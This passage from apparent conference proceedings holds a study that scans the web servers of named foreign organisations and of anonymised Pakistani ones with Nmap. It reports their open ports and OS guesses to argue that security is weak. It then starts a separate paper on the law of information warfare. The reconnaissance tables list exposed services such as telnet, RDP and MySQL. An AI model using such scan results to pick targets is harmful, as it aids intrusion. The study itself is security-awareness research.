(Vorakulpipat, C 2010) Ahmad A. Abu-Musa has conducted a survey to evaluate Computerized<br />
Accounting Information Systems security controls in Saudi organizations. (Ahmad 2006) Rafael et. al<br />
have performed a survey to analyze Canadian IT security practices. Three hundred IT security<br />
specialists were the subject of the survey to evaluate the Canadian IT security practices. (Rafael<br />
2009) Australian Taxation Office conducted a review of information security practices at the Australian<br />
Tax Office, to prevent any potential breach of data. (Australian Taxation Office 2008) US<br />
Environmental Protection Agency have conducted an audit to determine whether the Office of<br />
Administration’s (OARM’s) Integrated Contract Management System (ICMS) is complying with<br />
Federal and Agency information system security requirements. (United States Environmental<br />
Protection Agency 2006)<br />
The related work shows that where other people are concerned about their already secure<br />
information systems and is working to avoid any potential attack, Pakistani organizations are not<br />
189
Muhammad Naveed<br />
putting any efforts into information security which is evident from hacking of websites of Supreme<br />
Court of Pakistan, Pakistan Navy and many others important websites.<br />
3. Experimental setup<br />
All the tests were performed from the Internet using the following system and software:<br />
Table 1: Experimental setup<br />
Computer Intel Pentium D, 3.2 Ghz processor with 2 GB RAM<br />
Operating System Fedora 12 x86_64 (64bit Operating system)<br />
Scanning Software Nmap v5.21-1.x86_64 (a free open source scanner)<br />
4. Nmap port states<br />
According to Nmap official reference guide, the port states shown by Nmap are described as follows:<br />
4.1 open<br />
“An application is actively accepting TCP connections, UDP datagrams or SCTP<br />
associations on this port. Finding these is often the primary goal of port scanning.<br />
Security-minded people know that each open port is an avenue for attack. Attackers and<br />
pen-testers want to exploit the open ports, while administrators try to close or protect<br />
them with firewalls without thwarting legitimate users. Open ports are also interesting for<br />
non-security scans because they show services available for use on the network.” (Nmap<br />
Reference Guide)<br />
4.2 closed<br />
“A closed port is accessible (it receives and responds to Nmap probe packets), but there<br />
is no application listening on it. They can be helpful in showing that a host is up on an IP<br />
address (host discovery, or ping scanning), and as part of OS detection. Because closed<br />
ports are reachable, it may be worth scanning later in case some open up.<br />
Administrators may want to consider blocking such ports with a firewall. Then they would<br />
appear in the filtered state, discussed next.” (Nmap Reference Guide)<br />
4.3 filtered<br />
“Nmap cannot determine whether the port is open because packet filtering prevents its<br />
probes from reaching the port. The filtering could be from a dedicated firewall device,<br />
router rules, or host-based firewall software. These ports frustrate attackers because<br />
they provide so little information. Sometimes they respond with ICMP error messages<br />
such as type 3 code 13 (destination unreachable: communication administratively<br />
prohibited), but filters that simply drop probes without responding are far more common.<br />
This forces Nmap to retry several times just in case the probe was dropped due to<br />
network congestion rather than filtering. This slows down the scan dramatically.” (Nmap<br />
Reference Guide)<br />
4.4 unfiltered<br />
“The unfiltered state means that a port is accessible, but Nmap is unable to determine<br />
whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets,<br />
classifies ports into this state. Scanning unfiltered ports with other scan types such as<br />
Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.”<br />
(Nmap Reference Guide)<br />
4.5 open|filtered<br />
“Nmap places ports in this state when it is unable to determine whether a port is open or<br />
filtered. This occurs for scan types in which open ports give no response. The lack of<br />
190
Muhammad Naveed<br />
response could also mean that a packet filter dropped the probe or any response it<br />
elicited. So Nmap does not know for sure whether the port is open or being filtered. The<br />
UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.” (Nmap Reference<br />
Guide)<br />
4.6 closed|filtered<br />
“This state is used when Nmap is unable to determine whether a port is closed or filtered.<br />
It is only used for the IP ID idle scan.” (Nmap Reference Guide)<br />
5. Benchmark for the analysis<br />
The study was based on the following types of organizations:<br />
Educational and Research<br />
Commercial Organization<br />
News Channels<br />
Before analysis of the webservers in Pakistan, benchmark is set for the analysis using the famous<br />
organizations, which were assumed to be secure and the scans also showed them to be secure. As<br />
the study is based on the three types of organizations, we have set benchmarks for each of them.<br />
5.1 Education and research organizations<br />
To set the benchmark for education and research organization, Massachusetts Institute of<br />
Technology (MIT) webserver was scanned using its domain address. The scanned results show the<br />
best security, which is very impressive and attests that highly skilled and information security aware<br />
people are working in the network.<br />
The MIT’s scan result shows that only opened ports are those that are used by webserver and they<br />
should be open for the web service, all other ports are blocked. The aggressive operating system<br />
scan reveals with 94% accuracy that FreeBSD operating system is running on the server.<br />
The scan results for MIT are shown in Table 2 to Table 4.<br />
Table 2: Scan details for MIT<br />
Scanned Web Server www.mit.edu (18.9.22.169)<br />
Scan Launching Time 2010-08-14 00:50 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 2935.93 seconds<br />
Raw packets sent 4150 (156.946KB)<br />
Raw packets received 483 (29.058KB)<br />
Table 3: Port scan results for MIT<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
443 Tcp Open http<br />
8001 Tcp Open http (probably for MIT Radio)<br />
Table 4: Aggressive OS scan results for MIT<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Free BSD 6.2-<br />
General FreeBSD FreeBSD 6.X 94%<br />
RELEASE<br />
Purpose<br />
To further enhance the benchmark Indian Institute of Technology at Delhi was also analyzed which<br />
also revealed that the webserver is very secure. The only ports that were found open were the ports<br />
that are used by the webserver to provide web services. All other ports that were used were either<br />
behind the firewall and were protected or they were blocked. Aggressive operating system scan<br />
191
Muhammad Naveed<br />
shows a firewall OS probably installed on the firewall of the organization with 86% accuracy. Table 5<br />
to Table 7 show the results of IIT at Delhi, India.<br />
Table 5: Scan details for ITTD<br />
Scanned Web Server www.iitd.ac.in (220.227.156.20)<br />
Scan Launching Time 2010-08-14 00:55 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 3118.12 seconds<br />
Raw packets sent 3366 (126.658KB)<br />
Raw packets received 1368 (69.263KB)<br />
Table 6: Port scan results for ITTD<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
135 Tcp Filtered msrpc<br />
139 Tcp Filtered netbios-ssn<br />
443 Tcp Open http<br />
445 Tcp Filtered microsoft-ds<br />
593 Tcp Filtered http-rps-epmap<br />
1720 Tcp Filtered H.323/Q.931<br />
2100 Tcp Filtered unknown<br />
4111 Tcp Filtered unknown<br />
4444 Tcp Filtered krb524<br />
5060 Tcp Filtered sip<br />
Table 7: Aggressive OS scan results for IITD<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy<br />
of result<br />
SonicWALL Aventail EX-1500<br />
SSL VPN appliance<br />
Firewall SonicWALL Embedded No Details available 86%<br />
5.2 Commercial organizations<br />
To set the benchmark for commercial organizations, AT&T webserver was analyzed which revealed<br />
that the server is very secure based on our scans. The results shows that only the ports used for web<br />
services are open and all other ports are blocked. Aggressive operating system scan shows that<br />
Linux 2.6.9 – 2.6.30 is installed on the system. Table 8 to Table 11 show the results of scans for<br />
AT&T webserver. Table 11 show only general purpose OSs from the result because the webserver<br />
should be installed with a general purpose server OS.<br />
Table 8: Scan details for AT&T<br />
Scanned Web Server www.att.com (118.214.121.145)<br />
Scan Launching Time 2010-08-14 00:51 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 2982.98 seconds<br />
Raw packets sent 5125 (198.226KB)<br />
Raw packets received 778 (43.980KB)<br />
Table 9: Port scan result for AT&T<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
443 Tcp Open https<br />
192
Muhammad Naveed<br />
Table 10: Aggressive OS scan result for AT&T (Most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Linux 2.6.9 – 2.6.30 General Purpose Linux Linux 2.6.X 93%<br />
Table 11: Aggressive OS scan result for AT&T (Other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Linux Linux 88%<br />
General Prupose Toshiba Linux 2.4.X 88%<br />
General Purpose Linux Linux 2.4.X 87%<br />
5.3 News channels<br />
To set benchmark for news channel’s webservers, we analyzed the webserver of BBC which revealed<br />
that the only open ports are those that are used to provide web services. Though the result also<br />
shows some port in Open | filtered state which means that scan was not able to determine whether<br />
the port is opened or firewalled. SNMP port was found open on the server which is used for managing<br />
the server. The web server has good security. The aggressive OS scan revealed that there is Linux<br />
2.6.9 – 2.6.18 installed on the server. Table 12 to Table 14 show the results of scans for BBC web<br />
server.<br />
Table 12: Scan details for BBC<br />
Scanned Web Server www.bbc.co.uk (212.58.244.71)<br />
Scan Launching Time 2010-08-14 01:01 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 1211.74 seconds<br />
Raw packets sent 2593 (96.057KB) |<br />
Raw packets received 3662 (191.411KB)<br />
Table 13: Port Scan result for BBC<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
135 Tcp Filtered Msrpc<br />
139 Tcp Filtered Netbios-ssn<br />
443 Tcp Open http<br />
445 Tcp Filtered Microsoft-ds<br />
1720 Tcp Filtered H.232/Q.931<br />
5060 Tcp Filtered Sip<br />
53 Udp Open|filtered<br />
123 Udp Open | filtered<br />
135 Udp Filtered Msrpc<br />
136 Udp Filtered Profile<br />
137 Udp Filtered Netbios-ns<br />
Port Protocol State Service<br />
138 Udp Filtered Netbios-dgm<br />
139 Udp Filtered Netbios-ssn<br />
161 Udp Open Snmp<br />
445 Udp Filtered Microsoft-ds<br />
193
Muhammad Naveed<br />
5060 Udp Open |filtered<br />
20919 Udp Open | filtered<br />
Table 14: Aggressive OS scan results for BBC<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Linux 2.6.9 – 2.6.18 General Purpose Linux Linux 2.6.X 93%<br />
6. Analysis of web servers of Pakistan<br />
Webservers of the most prominent organizations were analyzed. The choice of the webservers to be<br />
scanned is the organization very similar in their services and status to the web servers used to set the<br />
benchmark. The identity of the webservers in Pakistan is kept hidden because the reputation of the<br />
organization might be affected by mentioning their name. But the trend shown is very common, and<br />
one can himself scan the various webservers in Pakistan and will come to the same conclusion. Any<br />
randomly chosen organization will reveal almost the same level of security because the study<br />
analyzed the most well reputed organization, which should be first to implement security.<br />
6.1 Education and research institutions<br />
For analyzing webservers of education and research organization, webservers of reputable<br />
universities of the country were selected. Two web servers were scanned.<br />
The analysis of the first web server revealed that the web server is being used as a mail server, ftp<br />
server, DNS and database server and the ports for all of these services were opened. First of all<br />
webserver should only be used as webserver by such a large organization, and if they should be<br />
used, they should be behind the firewall. None of the port was found filtered which may means that<br />
the organization doesn’t even have a firewall installed to protect their web server. Firewall also<br />
doesn’t guarantee complete security, but it’s a first step to secure the server, intrusion detection and<br />
prevention should also be used to enhance security. But, here the case is worst, they don’t even<br />
bother to install firewall to protect their webserver or if they have installed it, they haven’t used it to<br />
protect their server. The scan also revealed that Microsoft Windows 2003 Server SP2 was installed<br />
on the server, which due to its extensive use is more vulnerable to attacks then Linux based OS. As<br />
the Table 18 shows the other possibilities (Windows XP and 2000) but one can judge that they cannot<br />
be installed on the webserver.<br />
Table 15: Scan details<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 00:49 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 4214.71 seconds<br />
Raw packets sent 5090 (195.486KB)<br />
Raw packets received 191 (11.459KB)<br />
Table 16: Port scan results<br />
Port Protocol State Service<br />
20 Tcp Closed ftp-data<br />
21 Tcp Open ftp<br />
25 Tcp Open Smtp<br />
26 Tcp Open Smtp<br />
53 Tcp Open Domain<br />
80 Tcp Open http<br />
110 Tcp Open Pop3<br />
143 Tcp Open Imap<br />
443 Tcp Closed https<br />
465 Tcp Closed Smtps<br />
995 Tcp Open Pop3<br />
1038 Tcp Closed Unknown<br />
1039 Tcp Closed Unknown<br />
1434 Tcp Closed Ms-sql-m<br />
194
Muhammad Naveed<br />
2006 Tcp Open Mysql<br />
3306 Tcp Open Mysql<br />
3389 Tcp Open Microsoft-rdp<br />
Port Protocol State Service<br />
8402 Tcp Open http<br />
8443 Tcp Open http<br />
53 Udp Open Domain<br />
161 Udp Closed Snmp<br />
162 Udp Closed Snmptrap<br />
Table 17: Aggressive OS scan results (Most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of<br />
result<br />
Microsoft Windows Server<br />
2003 SP2<br />
General Purpose Microsoft Windows 2003 96%<br />
Table 18: Aggressive OS scan results (Other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Microsoft Windows XP 95%<br />
General Purpose Microsoft Windows 2000 89%<br />
The second webserver scanned also revealed the worst condition of security. Ssh server working at<br />
port 26 was found to be open for Internet, which should not be open. DNS, mysql and other ports<br />
detailed in table 20 were found open which also should not be open. A lot of ports are in Open|filtered<br />
state, and the ports might be open or firewalled. So, the web server is potentially insecure and one<br />
can easily see it form the results of port scan. Aggressive OS scan reveals that Linux 2.4.28 – Linux<br />
2.4.35 is installed on their server with 97% accuracy. Other OS guesses for webserver also shows<br />
that the webserver is installed with Linux. The old Linux version can be a potential security threat. The<br />
Linux version should not be so much old because that might not provide the required security. Scan<br />
results for the institution are shown in Table 19 to Table 22.<br />
Table 19: Scan details<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 00:48 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 1132.40 seconds<br />
Raw packets sent 2550 (92.637KB)<br />
Raw packets received 4548 (237.954KB)<br />
Table 20: Port scan results<br />
Port Protocol State Service<br />
26 Tcp Open Ssh<br />
53 Tcp Open Domain<br />
80 Tcp Open http<br />
111 Tcp Open Rpcbind<br />
1720 Tcp Filtered H.323/Q.931<br />
3306 Tcp Open Mysql<br />
5060 Tcp Filtered Sip<br />
8009 Tcp Open<br />
32768 Tcp Open Rpcbind<br />
53 Udp Open Domain<br />
111 Udp Open Rpcbind<br />
135 Udp Open | filtered<br />
5003 Udp Open | filtered<br />
5060 Udp Open | filtered<br />
18676 Udp Open | filtered<br />
18818 Udp Open | filtered<br />
20279 Udp Open | filtered<br />
21454 Udp Open | filtered<br />
23176 Udp Open | filtered<br />
195
Muhammad Naveed<br />
32768 Udp Open Rpcbind<br />
32769 Udp Open | filtered<br />
32772 Udp Open | filtered<br />
Port Protocol State Service<br />
48480 Udp Open | filtered<br />
54711 Udp Open | filtered<br />
57409 Udp Open | filtered<br />
63420 Udp Open | filtered<br />
Table 21: Aggressive OS scan results (most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Linux 2.4.28 – 2.4.35 General Purpose Linux Linux 2.4.X 97%<br />
Table 22: Aggressive OS scan results (other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Ubiquiti Linux 2.4.X 95%<br />
General Purpose Linux Linux 2.6.X 94%<br />
6.2 Commercial organizations<br />
For the commercial organization, the webserver scanned is of the organization providing the same<br />
services in Pakistan as AT&T provides in America. The organization have hundreds of millions of<br />
customers and was selected as this organization should be first to implement security. The scan<br />
reveals horrible results, even the telnet port is opened as well as SSH. The server is being used as<br />
ftp, telnet, ssh, mail (smtp, imap, pop3) and many other servers as shown by forth column of table 24.<br />
Many ports are found open on the server to provide the various services, although webserver is<br />
supposed to provide only web services and should not be used as any other server at least for such a<br />
big organization. The OS installed is a Prerelease version of FreeBSD, which is released to find bugs.<br />
The server should be installed with a stable OS.<br />
Table 23: Scan Details<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 00:50 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 7589.54 seconds<br />
Raw packets sent 2387 (88.397KB)<br />
Raw packets received 2302 (112.940KB)<br />
Table 24: Port scan results<br />
Port Protocol State Service<br />
21 Tcp Open ftp<br />
22 Tcp Open Ssh<br />
23 Tcp Open telnet<br />
25 Tcp Open Smtp<br />
80 Tcp Open http<br />
106 Tcp Open Pop3pw<br />
110 Tcp Open Pop3<br />
143 Tcp Open Imap<br />
443 Tcp Open http<br />
587 Tcp Open Smtp<br />
993 Tcp Open Imap<br />
995 Tcp Open Pop3<br />
1720 Tcp Filtered H.323/Q.931<br />
3306 Tcp Open Mysql<br />
5060 Tcp Filtered Sip<br />
5190 Tcp Open Smtp<br />
196
Muhammad Naveed<br />
8009 Tcp Open Ajp13<br />
8080 Tcp Open http<br />
9878 Tcp Open http<br />
Port Protocol State Service<br />
514 Udp Open | filtered<br />
5060 Udp Open | filtered<br />
5632 Udp Open | filtered<br />
49169 Udp Open | filtered<br />
Table 25: Aggressive OS scan results (most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
FreeBSD6.3-<br />
PRERELEASE<br />
General<br />
Purpose<br />
Table 26: Aggressive OS scan results (other)<br />
FreeBSD FreeBSD 6.X 96%<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose FreeBSD FreeBSD 5.X 93%<br />
General Purpose FreeBSD FreeBSD 7.X 90%<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Apple Mac OS X 10.4.X 89%<br />
General Purpose Apple Mac OS X 10.5.X 89%<br />
General Purpose FreeBSD FreeBSD 8.X 89%<br />
General Purpose FreeBSD FreeBSD 5.X 89%<br />
6.3 News channel<br />
For this type of organization, the webserver of country’s most widely seen and most trusted news<br />
channel’s webserver was scanned. The results showed that the server is being used for a lot of other<br />
services like ftp, mail, DNS and many more as can be seen from table 28. A lot of ports are found<br />
open on such a sensitive website. Aggressive OS scan also shows with 97% accuracy that Microsoft<br />
Windows Server 2003 SP2 is installed on the server which due to its extensive use is more vulnerable<br />
to attacks. The OS guesses as shown by Table 30 also shows that they cannot be installed on a<br />
server system. Results are shown in Table 27 to Table 30.<br />
Table 27: Scan results<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 01:03 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 1772.15 seconds<br />
Raw packets sent 2265 (85.521KB)<br />
Raw packets received 2354 (117.486KB)<br />
Table 28: Port scan result<br />
Port Protocol State Service<br />
21 Tcp Filtered ftp<br />
25 Tcp Open Smpt<br />
53 Tcp Open Domain<br />
80 Tcp Open http<br />
110 Tcp Open Pop3<br />
135 Tcp Open Msrpc<br />
445 Tcp Open Microsoft-ds<br />
646 Tcp Filtered Ldp<br />
1026 Tcp Open Msrpc<br />
1027 Tcp Open Msrpc<br />
1248 Tcp Open Netsain<br />
1433 Tcp Open Ms-sql-s<br />
1720 Tcp Filtered H.323/Q.931<br />
3306 Tcp Open Mysql<br />
197
Muhammad Naveed<br />
3389 Tcp Open Microsoft-rdp<br />
5060 Tcp Filtered Sip<br />
8081 Tcp Open http<br />
Port Protocol State Service<br />
8402 Tcp Open http<br />
8443 Tcp Open http<br />
9999 Tcp Open http<br />
53 Udp Open Domain<br />
123 Udp Open | filtered<br />
161 Udp Open | filtered<br />
445 Udp Open | filtered<br />
500 Udp Open | filtered<br />
1028 Udp Open | filtered<br />
1434 Udp Open | filtered<br />
3456 Udp Open | filtered<br />
4500 Udp Open | filtered<br />
5060 Udp Open | filtered<br />
Table 29: Aggressive OS scan results (most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Microsoft Windows General Microsoft Windows 2003 97%<br />
Server 2003 SP2 Purpose<br />
Table 30: Aggressive OS scan results (other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Microsoft Windows XP 91%<br />
General Purpose Microsoft Windows 2000 88%<br />
General Purpose Microsoft Windows PocketPC/CE 88%<br />
7. Conclusion and suggestions<br />
By looking at the statistics presented, it can be easily seen that the most prominent organizations of<br />
Pakistan don’t have their webservers secure. The results show the large number of ports that can be<br />
used to attack the webservers. Each of such ports is a potential venue of attack for the ill-intentioned<br />
people. The results can be compared with the benchmarks which have the best security. On the basis<br />
of these results it can be inferred that, if these wealthy and large organization don’t bother to invest<br />
the time and money in network security, the conditions for small organization will be worst. This study<br />
is intended to give just an overview of importance given to security in our region and is by no means a<br />
detailed security analysis of these webservers. Webservers are used just as an index to study the<br />
security practices because they are most easily accessible and most important resource of an<br />
organization.<br />
All of the organization having webservers or networks connected to the Internet should use the<br />
scanners like Nmap (which we have used in this study) to find the security loopholes in their networks<br />
and then try to rectify them. Every organization should have proper network security policy and it<br />
should be ensured that the network security policy is implemented well. Every effort should be done<br />
to make the network as secure as possible. Even the most secure networks are not secure today, so<br />
the insecure networks can presents a lot of difficulties and problems, which might not be apparent<br />
today but insecure networks have to pay the price in future.<br />
Pakistan is already suffering from terrorism. Thousands of people have lost their lives and billions of<br />
dollars have been spent on the war against terrorism. Cyber terrorism is one of the next avenue that<br />
terrorist can use to give a new direction to their terrorist activities. One can imagine the severe<br />
consequences if terrorists are able to exploit webserver of popular news channel. They can transmit a<br />
message about a plane crash, presence of bomb in a very busy place, announcement about attack<br />
on the country’s active enemy and lot of others that may have very adverse effects. Pakistan being a<br />
nuclear power cannot afford this in any case because that might lead to a nuclear war.<br />
References<br />
Ahmad A. Abu-Musa (2006), " Evaluating the Security Controls of CAIS in Developing Countries: The Case of<br />
Saudi Arabia," The International Journal of Digital Accounting Research, 2006, vol. 6 no. 11, pp. 25 – 64<br />
198
Muhammad Naveed<br />
Austalian Taxation Office (2008), ‘Information Security Practices Review’ V2.0, [Online] Available:<br />
http://www.ato.gov.au/content/downloads/COR138560InfoSecurity.pdf [April 2008]<br />
DawnNews (2010), ‘Govt starts securing 36 hacked websites’, [Online] Available:<br />
http://www.dawn.com/2010/11/30/forty-pakistan-government-websites-hacked.html [30 November 2010]<br />
GEO Pakistan (2010), ‘Supreme court website hacked’, [Online] Available: http://www.geo.tv/9-30-<br />
2010/72139.htm [30 September 2010]<br />
Jahanzaib Haque (2010), 'Cyber warfare: Indian hackers take down 36 govt websites', The Express Tribune,<br />
[Online] Available: http://tribune.com.pk/story/84269/cyber-warfare-indian-hackers-take-down-36-govtwebsites/<br />
[01 Dec 2010]<br />
Nmap Reference Guide, [Online] Available: http://nmap.org/book/man.html<br />
PakCert (2005), ‘Defacement Archive of hacked Pakistani Web Sites'’, Pakistan Computer Emergency Response<br />
Team [Online] Available: http://www.pakcert.org/defaced/index.html<br />
PakCert (2008), ‘Defacement Statistics (January 1999 - August 2008)'’, Pakistan Computer Emergency<br />
Response Team [Online] Available: http://www.pakcert.org/defaced/stats.html<br />
Rafael Etges, Walid Hejazi and Alan Lefort (2009), "A Study on Canadian IT Security Practices," ISACA Journal,<br />
2009, vol. 2, pp. 1 – 3 Available:http://www.isaca.org/Journal/Past-Issues/2009/Volume-<br />
2/Documents/jpdf0902-online-a-study.pdf<br />
Syed M. Amir Husain (1998), 'Pakistan needs an Information Warfare capability', Defence Journal, [Online]<br />
Available: http://www.defencejournal.com/july98/pakneeds1.htm<br />
The Express Tribune (2010), ‘36 government sites hacked by 'Indian Cyber Army'’, [Online] Available:<br />
http://tribune.com.pk/story/83967/36-government-websites-hacked-by-indian-cyber-army/ [30 November<br />
2010]<br />
Trend Micro (2009), “Data-stealing Malware on the Rise – Solutions to Keep Businesses and Consumers Safe”,<br />
[Online]<br />
Available:http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/data_stealing_malware_<br />
focus_report_-_june_2009.pdf [June 2009]<br />
United States Environmental Protection Agency – Office of Inspector General (2006), ‘Information Security<br />
Series: Security Practices' Report No. 2006-P-00010, [Online] Available:<br />
http://www.epa.gov/oig/reports/2006/20060131-2006-P-00010.pdf [31 January 2006]<br />
Vorakulpipat, C.; Siwamogsatham, S.; Pibulyarojana, K. (2010) , "Exploring information security practices in<br />
Thailand using ISM-Benchmark," Proceedings of Technology Management for Global Economic Growth<br />
(PICMET), 2010, pp.1-4, 18-22 July 2010<br />
199
International Legal Issues and Approaches Regarding<br />
Information Warfare<br />
Alexandru Nitu<br />
Romanian Intelligence Service, Bucharest, Romania<br />
alexandru.nitu@gmail.com<br />
Abstract: In present times, societies and economies increasingly rely on electronic communications, becoming<br />
more vulnerable to threats from cyberspace. At the same time, states' military and intelligence organizations are<br />
increasingly developing the capability to attack and defend computer systems. The progress of information<br />
technology makes it possible for adversaries to attack each other in new ways, inflicting new forms of damage;<br />
technological change enables cyberwarfare acts that do not fit within existing legal categories, or may reveal<br />
contradictions among existing legal principles. The paper examines the relationship between information warfare<br />
and the law, especially international law and the law of war, as it is apparent that some fundamental questions<br />
regarding this new and emerging type of security threat need to be explored. For example, what types of<br />
activities between nation states, could or should be called information warfare? What are ‘force’, ‘armed attack’,<br />
or ‘armed aggression’ - terms from the UN Charter - in the Information Age, and do they equate to information<br />
warfare? Information warfare is neither ‘armed’ in the traditional sense, nor does it necessarily involve conflict, so<br />
an important issue is if ‘war’ between states necessarily require physical violence, kinetic energy, and human<br />
casualties. A threshold question that arises from the development of information warfare techniques is thus the<br />
definitional one: has the development of information warfare technology and techniques taken information<br />
warfare out of the existing legal definition of war? Characteristics of information technology and warfare pose<br />
problems to those who would use international law to limit information warfare, and leave legal space for those<br />
who would wage such warfare. Consequently, there may be confusion over what limits may apply to the conduct<br />
of information warfare, and when information warfare attacks may be carried out. Prospects of new technological<br />
attacks pose problems for international law because law is inherently conservative. From this point of view, the<br />
paper examines how the law itself might change in response to the fast development of information technology<br />
and how will long-established legal principles such as national sovereignty and the inviolability of national borders<br />
be affected by the ability of cyberspace to transcend such concepts.<br />
Keywords: international law, information warfare, use of force, Charter of the United Nations, Geneva<br />
conventions<br />
1. Introduction<br />
Intensive development of information and communication technologies and their wide use in all<br />
spheres of human activity have accelerated post-industrial development and the building of a global<br />
information society, becoming a driving force for social development. The global information<br />
infrastructure provides unprecedented opportunities for communication among people, their<br />
socialization and access to information. Individuals, societies and states depend on the stability and<br />
reliability of the information infrastructure.<br />
Computers and computer networks have become increasingly integral to government, military, and<br />
civilian functions. They allow instant communication and provide platforms on which business and<br />
government alike can operate. Computers now control both military and civilian infrastructures,<br />
including nuclear arsenals, telecommunication networks, electrical power systems, water supplies, oil<br />
storage facilities, financial systems, and emergency services.<br />
As the worldwide explosion of information technology (IT) is changing the ways that business,<br />
government, and education are conducted, it also promises to change the way wars are waged. The<br />
development of information technology makes it possible for adversaries to attack each other in new<br />
ways and to inflict new forms of damage, and may create new targets for attack. Attackers may use<br />
international networks to damage or disrupt enemy systems, without ever physically entering the<br />
enemy's country.<br />
Information technologies enable a fundamentally new and effective means to disrupt or destroy a<br />
country's industry, its economy, social infrastructure and public administration. They have the<br />
potential to be a means of combat capable of achieving goals related to inter-state confrontation at<br />
the tactical, operational and strategic levels. Whatever the development and diffusion of information<br />
technology mean for the future of warfare, it is apparent that many of the new forms of attack that<br />
information technology enables are qualitatively different from prior forms of attack. The use of such<br />
tools as computer intrusion and computer viruses, for example, take war out of the physical, kinetic<br />
200
Alexandru Nitu<br />
world and bring it into an intangible, electronic one. Effects previously attainable only through physical<br />
destruction are now accomplished remotely with the silent means of information technology.<br />
These new ways of fighting have been labeled Information Warfare (IW). Definitions and conceptions<br />
of IW are numerous, but generally entail preserving one’s own information and information technology<br />
while exploiting, disrupting, or denying the use of an adversary’s (Shackelford 2009). In US military<br />
doctrine, IW it is part of a much larger strategic shift that was named Information Operations (IO).<br />
Information Operations involve actions taken to affect adversary information and information systems<br />
while defending one’s own information and information systems. Information Operations apply across<br />
all phases of an operation, throughout the range of military operations, and at every level of war.<br />
Information Warfare is Information Operations conducted during time of crisis or conflict, including<br />
war, to achieve or promote specific objectives over a specific adversary or adversaries (Joint Chiefs of<br />
Staff 1998).<br />
The new emerging vulnerabilities that information age generates are more likely to be exploited by<br />
opponents of developed states that cannot hope to prevail on the battlefield, or even at the<br />
negotiations table. A lesser-advantaged state hoping to seriously harm a dominant adversary must<br />
inevitably compete asymmetrically. It must seek to counter the strengths of the opponent not head-on,<br />
but rather employing unorthodox means to strike at centers of gravity.<br />
IW offers such asymmetrical benefits. In the first place, in many cases a computer network attack will<br />
either not merit a response involving the use of force, or the legality of such a response could be<br />
debatable, even if the victim is able to accurately identify the attack and its source. Thus, because of<br />
the potentially grave impact of cyber attacks on a state’s infrastructure, it can prove a high gain, low<br />
risk option for a state outclassed militarily or economically. Moreover, to the extent that an opponent is<br />
militarily and economically advantaged, it is probably technologically dependent, and, therefore,<br />
teeming with tempting targets.<br />
2. IW and the ‘use of force’ concept<br />
Several rules govern when force can be used (the jus ad bellum, which focuses on the criteria for<br />
going to war, covering issues such as right purpose, duly constituted authority, last resort) and how<br />
states can use that force in an armed conflict (the jus in bello or ‘law of war’, that creates the concept<br />
of just war-fighting, covering discrimination, proportionality, humanity etc). These rules have diverse<br />
sources, including the U.N. Charter, international humanitarian law treaties, including the 1949<br />
Geneva Conventions, as well as customary international humanitarian law. Some of these existing<br />
laws involve principles of general applicability that could encompass IW. Nevertheless, the gap<br />
between physical weaponry (whether kinetic, biological, or chemical) and IW’s virtual methods can be<br />
substantial, creating translation problems.<br />
The sort of intangible damage that IW attacks may cause is analytically different from the physical<br />
damage caused by the use of armed force in traditional warfare. The kind of destruction that bombs<br />
and bullets cause is easy to see and understand, and fits well within longstanding views of what war<br />
means. In contrast, the disruption of information systems, including the corruption or manipulation of<br />
stored or transmitted data, may cause intangible damage, such as disruption of civil society or<br />
government services. These may be more closely equivalent to activities such as economic sanctions<br />
that may be undertaken in times of peace rather than acts of aggression (Greenberg 1998).<br />
Whether or not an information warfare attack can be considered ‘use of force’ or ‘aggression’ is<br />
relevant to the fact that a forceful response can be justified as self-defense, as well as to the issue of<br />
whether a particular response would be proportionate to the original attack.<br />
Modern law on the use of force is based on the U.N. Charter. An analysis of international law and IW<br />
could begin with the prohibition of the use of force in Article 2(4): ‘All Members shall refrain in their<br />
international relations from the threat or use of force against the territorial integrity or political<br />
independence of any state, or in any other manner inconsistent with the Purposes of the United<br />
Nations’ (Charter of the United Nations, Art.2(4)). The drafters intended to prohibit all types of force,<br />
except those carried out under the aegis of the United Nations or as provided for by the Security<br />
Council, and wanted to restrict the use of force severely by sharply limiting its use to situations<br />
approved by the Security Council (Barkham 2001).<br />
201
Alexandru Nitu<br />
The fact is that neither the Charter nor any international body has defined the term ‘use of force’<br />
